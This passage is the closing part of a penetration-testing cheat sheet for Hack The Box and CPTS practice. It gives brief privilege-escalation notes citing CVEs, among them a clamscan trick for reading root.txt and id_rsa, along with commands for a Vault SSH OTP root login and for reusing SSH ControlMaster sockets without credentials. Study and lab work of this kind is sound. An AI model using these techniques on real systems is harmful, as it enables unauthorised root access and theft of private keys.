/etc/fail2ban/action.d/iptables-multiport.conf 671 > # git apply symlink CVE-2023-23946 (Snoopy) 672 > # clamscan --file-list <file> reads root.txt/id_rsa; or XXE CVE-2023-20052 (Snoopy) 673 > # Webmin CVE-2019-12840 (Postman) — Package Updates module RCE as root 674 > # HashiCorp Vault SSH OTP (Craft): 675 > vault ssh -mode=otp -role=root_otp root@127.0.0.1 676 > # SSH ControlMaster socket reuse in a container (Ghost): 677 > ssh user@host # reuses ~/.ssh/controlmaster/*@host:22 without creds 678 > ``` 679 680 --- 681 682 ## // REFERENCES 683 684 > [!info] (used to build the workflow) 685 > - Fluffy, TombWatcher, Redelegate, VulnCicada, Media, Pov, Snoopy, Authority, StreamIO — [0xdf](https://0xdf.gitlab.io/) 686 > - [Certipy Wiki — ESC techniques](https://github.com/ly4k/Certipy/wiki) 687 > - [The Hacker Recipes — AD](https://www.thehacker.recipes/) 688 > - [HackTricks — AD methodology](https://book.hacktricks.xyz/windows-hardening/active-directory-methodology) 689 > - [GTFOBins](https://gtfobins.github.io/) · [LOLBAS](https://lolbas-project.github.io/) · [NetExec wiki](https://www.netexec.wiki/) 690 691 --- 692 693 #Command-Reference #Cheatsheet #CPTS-Prep #AD #ADCS #Kerberos #Enumeration #Privilege-Escalation #HTB